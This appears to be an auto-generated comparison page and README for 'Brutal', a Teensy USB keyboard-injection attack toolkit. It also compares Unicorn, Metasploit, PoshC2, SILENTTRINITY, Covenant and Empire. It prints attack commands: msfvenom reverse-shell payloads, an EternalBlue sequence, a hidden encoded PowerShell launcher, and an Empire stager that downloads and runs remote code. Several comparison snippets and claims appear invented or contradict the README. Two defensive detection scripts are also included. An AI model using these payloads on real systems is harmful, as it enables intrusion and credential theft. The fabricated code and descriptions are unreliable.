Brutal
Payload for Teensy, like a Rubber Ducky but with a different syntax. This is a Human Interface Device (HID) attack: penetration with Teensy. Brutal is a toolkit to quickly create various payloads, PowerShell attacks, virus attacks, and launch a listener for a Human Interface Device (Payload Teensy).
Top Related Projects
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Metasploit Framework
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
Covenant is a collaborative .NET C2 framework for red teamers.
Empire is a PowerShell and Python post-exploitation agent.
Quick Overview
Brutal is a toolkit for penetration testing and security research, focusing on creating and managing remote access trojans (RATs) and payloads. It provides a framework for generating, obfuscating, and deploying various types of malware for educational and authorized testing purposes.
Pros
- Comprehensive suite of tools for creating and managing RATs
- Supports multiple platforms and programming languages
- Includes obfuscation techniques to evade detection
- Actively maintained and regularly updated
Cons
- Can be misused for malicious purposes if not handled responsibly
- Requires advanced knowledge of security concepts and programming
- May trigger antivirus software during legitimate testing
- Legal and ethical considerations must be carefully addressed before use
Getting Started
- Clone the repository:
  git clone https://github.com/screetsec/Brutal.git
- Navigate to the Brutal directory:
  cd Brutal
- Install dependencies:
  sudo chmod +x install.sh
  sudo ./install.sh
- Run Brutal:
  sudo python3 Brutal.py
Note: Always ensure you have proper authorization and are complying with all applicable laws and regulations before using this tool. Use responsibly and only in controlled, authorized environments.
Competitor Comparisons
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Pros of Unicorn
- Focused specifically on PowerShell payload generation
- Lightweight and easy to use
- Actively maintained with frequent updates
Cons of Unicorn
- Limited to PowerShell-based payloads
- Fewer customization options compared to Brutal
- Less comprehensive toolkit for overall penetration testing
Code Comparison
Unicorn (payload generation):
payload = "powershell -window hidden -enc {0}".format(base64.b64encode(unicode(powershell_code).encode('utf-16le')))
Brutal (payload generation):
payload = "msfvenom -p {0} LHOST={1} LPORT={2} -f {3} > {4}".format(payload, lhost, lport, format, output)
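For triage, the `-enc` argument built in the Unicorn line above is only base64 over UTF-16LE text, so a defender can reverse it from a logged command line. The following is an added example, not code from Unicorn or Brutal; the function names and the sample command lines are constructed for illustration.

```python
import base64


def flag_name(token):
    """Lower-cased parameter name if token looks like -Name or /Name, else None."""
    if len(token) > 1 and token[0] in "-/":
        return token[1:].lower()
    return None


def triage(cmdline):
    """Return (hidden_window, decoded_script_or_None) for one command line."""
    tokens = cmdline.split()
    hidden, decoded = False, None
    for flag, value in zip(tokens, tokens[1:]):
        name = flag_name(flag)
        if name is None:
            continue
        value = value.strip("\"'")
        # PowerShell accepts abbreviated names: -w / -window / -WindowStyle
        if "windowstyle".startswith(name) and value.lower() == "hidden":
            hidden = True
        # ... and -e / -enc / -EncodedCommand, plus the -ec alias
        elif "encodedcommand".startswith(name) or name == "ec":
            try:
                raw = base64.b64decode(value, validate=True)
                decoded = raw.decode("utf-16-le")
            except ValueError:  # invalid base64, or bytes that are not UTF-16LE
                decoded = None
    return hidden, decoded


def suspicious(lines):
    """Command lines that both hide the window and carry a decodable script."""
    hits = []
    for line in lines:
        hidden, script = triage(line)
        if hidden and script is not None:
            hits.append((line, script))
    return hits


# Constructed process-creation command lines; the encoded one wraps a harmless cmdlet.
B64_SAMPLE = base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii")
SAMPLE = [
    f"powershell -window hidden -enc {B64_SAMPLE}",
    "powershell -NoProfile -File C:\\scripts\\backup.ps1",
    "powershell -w hidden -e not*base64",
]

if __name__ == "__main__":
    for line, script in suspicious(SAMPLE):
        print(line, "->", script)
```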
Summary
Unicorn is a specialized tool for generating PowerShell-based payloads, offering simplicity and ease of use. It's actively maintained but has a narrower focus compared to Brutal.
Brutal, on the other hand, provides a more comprehensive toolkit for penetration testing, including various payload types and additional features. However, it may have a steeper learning curve and require more setup.
The choice between the two depends on the specific needs of the user, with Unicorn being ideal for quick PowerShell payload generation and Brutal offering a broader range of penetration testing capabilities.
Metasploit Framework
Pros of Metasploit Framework
- Extensive library of exploits and modules
- Active community and regular updates
- Robust documentation and support
Cons of Metasploit Framework
- Steeper learning curve for beginners
- Larger resource footprint
- More complex setup and configuration
Code Comparison
Brutal (payload generation):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload.exe
Metasploit Framework (exploit usage):
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker_ip>
exploit
Brutal focuses on simplifying payload generation and social engineering attacks, while Metasploit Framework offers a more comprehensive suite of penetration testing tools. Brutal is more accessible for beginners, but Metasploit provides greater depth and flexibility for advanced users. Both tools serve different purposes within the security testing ecosystem, with Brutal emphasizing ease of use and Metasploit offering a broader range of capabilities.
A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
Pros of PoshC2
- More focused on PowerShell-based post-exploitation and C2 functionality
- Actively maintained with regular updates and community support
- Extensive documentation and usage guides available
Cons of PoshC2
- Limited cross-platform support compared to Brutal's multi-OS capabilities
- Steeper learning curve for users not familiar with PowerShell
- Less emphasis on initial access and social engineering techniques
Code Comparison
PoshC2 (PowerShell-based command execution):
Invoke-PoshCommand -Command "Get-Process" -ComputerName $target
Brutal (Python-based payload generation):
payload = Payload("windows/meterpreter/reverse_tcp", lhost="192.168.1.100", lport=4444)
Summary
PoshC2 excels in PowerShell-based post-exploitation and command and control, offering a more specialized toolset for Windows environments. It benefits from active development and comprehensive documentation. However, it may be less accessible to users without PowerShell expertise and has limited cross-platform functionality.
Brutal, on the other hand, provides a broader range of attack vectors and social engineering tools, with support for multiple operating systems. Its Python-based approach may be more familiar to a wider audience, but it lacks the depth of PowerShell-specific features found in PoshC2.
Choose PoshC2 for advanced Windows-focused operations, or Brutal for a more versatile, multi-platform approach to penetration testing and social engineering.
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
Pros of SILENTTRINITY
- Written in Python, offering better cross-platform compatibility
- Utilizes modern post-exploitation techniques and evasion methods
- Supports multiple communication protocols (HTTP/S, DNS, SMB)
Cons of SILENTTRINITY
- Less user-friendly for beginners compared to Brutal's simpler interface
- Requires more setup and configuration
- Smaller community and fewer resources available for support
Code Comparison
SILENTTRINITY (Python):
from silenttrinity import SilentTrinity
st = SilentTrinity()
st.start_teamserver()
st.connect_client()
st.execute_module("shell", "whoami")
Brutal (Bash):
#!/bin/bash
source brutal.sh
start_listener
generate_payload
execute_command "whoami"
Both tools are designed for post-exploitation and penetration testing, but SILENTTRINITY offers more advanced features and flexibility at the cost of complexity. Brutal, on the other hand, provides a simpler approach with its bash-based scripting, making it more accessible for users familiar with Linux environments. The choice between the two depends on the user's specific needs, skill level, and target environment.
Covenant is a collaborative .NET C2 framework for red teamers.
Pros of Covenant
- More advanced and feature-rich C2 framework
- Utilizes .NET Core for cross-platform compatibility
- Offers a graphical user interface for easier management
Cons of Covenant
- Steeper learning curve due to complexity
- Requires more resources to run effectively
- Less focused on social engineering techniques
Code Comparison
Covenant (C#):
public class Grunt : IMessenger
{
    public string Name { get; set; }
    public string Guid { get; set; }
    public GruntStatus Status { get; set; }
}
Brutal (Python):
class Brutal:
    def __init__(self):
        self.name = "Brutal"
        self.version = "1.0"
        self.description = "Payload Generator for Penetration Testing"
Covenant is a more comprehensive C2 framework written in C#, offering advanced features and a GUI. It's cross-platform but requires more resources and has a steeper learning curve. Brutal, on the other hand, is a simpler Python-based tool focused on payload generation and social engineering. While Covenant provides a full-fledged C2 infrastructure, Brutal excels in quick payload creation for specific scenarios. The code comparison shows Covenant's object-oriented approach for managing "Grunts" (agents), while Brutal's code demonstrates its straightforward structure for payload generation.
Empire is a PowerShell and Python post-exploitation agent.
Pros of Empire
- More comprehensive and feature-rich post-exploitation framework
- Actively maintained with regular updates and community support
- Supports a wider range of operating systems and attack vectors
Cons of Empire
- Steeper learning curve due to its complexity
- Larger codebase, potentially making it harder to customize or modify
- May be more easily detected by antivirus software due to its popularity
Code Comparison
Empire (PowerShell stager):
$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server/launcher');
Brutal (Metasploit payload generation):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload.exe
Both repositories are powerful post-exploitation frameworks, but they differ in scope and complexity. Empire is more comprehensive and versatile, while Brutal focuses on simplicity and ease of use for specific attack scenarios. Empire's codebase is more extensive, offering a wider range of features but requiring more time to master. Brutal, on the other hand, provides a more straightforward approach to payload generation and exploitation, making it easier for beginners to use but potentially limiting its capabilities in complex scenarios.
README
Now Teensy can be used for penetration
Teensy is like a Rubber Ducky. Why did I choose Teensy? Because the price is very cheap for me. It's extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction (HID attack). When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target's machine and completely compromise it, regardless of autorun. I've used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all passwords. Now I am developing a new tool named Brutal.
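The speed described above is also what gives such a device away to a defender. The following is an added example, not part of the Brutal project: it flags a keyboard whose keystroke bursts are both too fast and too regular for a human typist. The thresholds, device names and timestamps are assumptions constructed for illustration.

```python
from statistics import median, pstdev

# Assumed thresholds (tune per environment): humans rarely sustain
# inter-key gaps under ~30 ms, and their timing is far less regular.
MAX_MEDIAN_GAP_MS = 30.0
MAX_JITTER_MS = 5.0
MIN_BURST = 10  # keystrokes needed before a verdict is given


def split_bursts(timestamps_ms, idle_ms=1000.0):
    """Split key-down timestamps into bursts separated by idle pauses."""
    bursts, current = [], []
    for t in timestamps_ms:
        if current and t - current[-1] > idle_ms:
            bursts.append(current)
            current = []
        current.append(t)
    if current:
        bursts.append(current)
    return bursts


def looks_injected(burst):
    """True when a burst is both too fast and too regular for human typing."""
    if len(burst) < MIN_BURST:
        return False
    gaps = [b - a for a, b in zip(burst, burst[1:])]
    return median(gaps) <= MAX_MEDIAN_GAP_MS and pstdev(gaps) <= MAX_JITTER_MS


def classify(events):
    """events: {device_id: [key-down timestamps in ms]} -> set of flagged ids."""
    return {dev for dev, ts in events.items()
            if any(looks_injected(b) for b in split_bursts(sorted(ts)))}


# Constructed sample data: one human typist, and one device that emits a key
# every 4 ms.
HUMAN = [0, 180, 310, 520, 640, 910, 1020, 1250, 1400, 1610, 1790, 1930]
SCRIPTED = [5000 + 4 * i for i in range(40)]
SAMPLE = {"usb-1.2 (constructed)": HUMAN, "usb-1.4 (constructed)": SCRIPTED}

if __name__ == "__main__":
    print(classify(SAMPLE))
```

In practice the timestamps would come from the operating system's input event stream, keyed by the USB device that produced them.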
Brutal
Brutal is a toolkit to quickly create various payloads, PowerShell attacks, virus attacks, and launch a listener for a Human Interface Device.
Donate
- If this project helps you a lot with penetration testing and you want to support me, you can give me a cup of coffee :)
Video
- Check this video: https://www.youtube.com/watch?v=WaqY-pQpuV0
- Do you want something like the Mr. Robot hacking scene where Angela Moss plugs a USB into a computer to get credential information? You can choose the payload in Brutal (option 3 or 4).
The Goal
- Generate various payloads and PowerShell attacks without coding
- To help break computers very fast and agile :p
- Payload compatibility: target Windows machines only
Requirements
- Arduino Software (I used v1.6.7)
- TeensyDuino
- Linux udev rules
- How to install all requirements? Visit This Wiki
Supported Hardware
The following hardware has been tested and is known to work.
- Teensy 3.x
- USB cable
:scroll: Changelog
Be sure to check out the [Changelog] and read CHANGELOG.md
Getting Started
Copy and paste the PaensyLib folder inside your Arduino\libraries
git clone https://github.com/Screetsec/Brutal.git
cd Brutal
chmod +x Brutal.sh
sudo ./Brutal.sh or sudo su ./Brutal.sh
BUG ?
- Submit new issue
- Contact me
- Hey, sup? Do you want to ask about all my tools? You can join me at telegram.me/offscreetsec
Donations
-
- Donation: Send to bitcoin
- Bitcoin address: 1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS
:octocat: Credits
- Thanks to Allah and Screetsec [ Edo -maland- ]
- Dracos Linux from Scratch Indonesia (awesome penetration OS), you can see it at http://dracos-linux.org/
- Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
- http://www.kali.org/
- Jack Wilder, admin at http://www.linuxsec.org
- And other open source tools on GitHub
- For up-to-date new hacking tools, visit http://www.kitploit.com
Disclaimer
Note: modifications, changes, or alterations to this source code are acceptable; however, any public releases utilizing this code must be approved by the writer of this tool (Edo -m-).